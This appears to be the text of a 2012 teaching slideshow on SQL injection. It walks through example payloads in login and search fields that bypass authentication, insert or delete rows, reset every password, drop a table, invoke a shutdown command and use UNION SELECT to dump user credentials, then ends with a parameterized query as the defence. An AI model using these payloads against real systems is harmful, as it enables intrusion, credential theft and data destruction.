SQL-Injections
Attacks on data management
Daniel Schosser
Sept. 2012
Daniel Schosser
Sept. 2012
What is SQL?
What can we use SQL for?
How does SQL Statements look like?
SELECT * FROM users WHERE name="________" AND password="________";--
Where do people use SQL?
Where are SQL-Injections possible?
Example SQL-Statement for a login-form
SELECT * FROM users WHERE name="________" AND password="________";--
Example SQL-Statement for a login-form
SELECT * FROM users WHERE name="John";--" AND password="________";
Insert unauthorized data
Password: foobar"; INSERT INTO users (name, passwort, email) VALUES ("anonymous", "secret", "anonymous@example.com")
SELECT * FROM users WHERE name="not important" AND password="foobar"; INSERT INTO users (name, passwort, email) VALUES ("anonymous", "secret", "anonymous@example.com")";--
Avoid authorisation
Username: "John"
Password: foobar" OR WHERE 1=1
SELECT * FROM users WHERE name="John" AND password="foobar" OR WHERE 1=1";--
Data manipulation
Username: "John"
Password: foobar"; UPDATE users SET password="helloWorld
SELECT * FROM users WHERE name="John" AND password="foobar"; UPDATE users SET password="helloWorld";--
Delete data
Username: "John"
Password: foobar"; DELETE FROM users WHERE level="admin
SELECT * FROM users WHERE name="John" AND password="foobar"; DELETE FROM users WHERE level="admin";--
GO EXEC cmdshell("shutdown /s");--
Robert"); DROP TABLE Students;--
Gathering Informations
SELECT * FROM users WHERE 1=1
Problem:
The application is waiting for a username, an email adress and the users password. But the sql-injection results in three differently named columns.
We search for books:
2010
title | price | published |
---|---|---|
SQL Injection | $29 | 2010 |
Ethical Hacking | $26.99 | 2010 |
We search for books:
2010" UNION SELECT username, password, email FROM user#
title | price | published |
---|---|---|
Administrator | secretPassword | admin@foobar.com |
Developer | youWillNeverGuess | developer@foobar.com |
SQL Injection | $29 | 2010 |
Support | easyPassword | support@foobar.com |
Ethical Hacking | $26.99 | 2010 |
public function fetchAllByUserId( $uid ) { return $this->fetchAllAbstract( $this->getBaseSelect() ->where( "users.id = ?", $uid ) ); }
All input is evil, until proven otherwise!